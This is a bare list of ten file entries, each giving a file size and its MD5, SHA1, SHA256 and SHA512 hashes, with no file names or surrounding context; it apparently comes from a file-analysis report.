MD528462c21c4c3095c409ef6ace38b0d55
SHA11ee55578fe8c3e0cad5831342841c0675f440699
SHA256f3acec2e5690051a77059476412be3dbdbebe2fe9f6faee64f613f914b8f0941
SHA5124ab5c47077d010d8b6667327ce3f2e485a9b80f674d291a948687eab713bfdbe9bcd455e6e7ae2e633e8d9a370c872b0019f2f2855575fa571f4d59eb5fcf8e3
-
Filesize
3.3MB
MD570aeab7678651f8eb78eb5e504c4ef20
SHA12f72462263cc7d801bf1abd7a201f3eefb307fb8
SHA256e10b972de2a9a2a2ab21511b93a3ae7f262af726f89e305851cd51182c54fa10
SHA51230004507f874c79a5b02e8bd842af501851413d00867ae53a89dd8695f67905d8232fed93f070244d450c4c6d58442e9400c3df068b47e3d87496d4d8767ef19
-
Filesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
Filesize
1.2MB
MD50d8fbbe898db28eb020d34a5966f7e13
SHA1ccca2707aaaa06df4fb28739a43d97389a3bff66
SHA2565c94aab2d732853065e0d4481b462e26a9d35e385684821e85972c8edbff1437
SHA51261e7971440d6f2f0dfe71b876d19fbbc347708b4b054d8f3c2e0f1d3917cd2dba0cea6341c2aaecf234e4a4b4e3d2221ef685b9c7b405aa9451463eb907bd987
-
Filesize
22KB
MD592dc6ef532fbb4a5c3201469a5b5eb63
SHA13e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA2569884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA5129908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3
-
Filesize
22KB
MD5ab35386487b343e3e82dbd2671ff9dab
SHA103591d07aea3309b631a7d3a6e20a92653e199b8
SHA256c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2
SHA512b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09
-
Filesize
37KB
MD567965a5957a61867d661f05ae1f4773e
SHA1f14c0a4f154dc685bb7c65b2d804a02a0fb2360d
SHA256450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105
SHA512c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b
-
Filesize
39KB
MD51ea948aad25ddd347d9b80bef6df9779
SHA10be971e67a6c3b1297e572d97c14f74b05dafed3
SHA25630eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488
SHA512f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545
-
Filesize
2KB
MD5a69559718ab506675e907fe49deb71e9
SHA1bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA2562f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
-
Filesize
2.5MB
MD5d0e24e6d7017127bea02bb0160229bee
SHA134350e5b7f268797b2a7ec56390c2228f841b37b
SHA256ca0a5b43e255d0fa7205be3437ea706eda966dd1839ae01d1de1d3b62f832994
SHA512f5c2edc35c2e43e199c2d4d1d904d9b06cc238b99a6f691f5a9c820c8ed0db77346158ae41237f0086a5009012202bdab4b533b42223f72837c461a499be5c86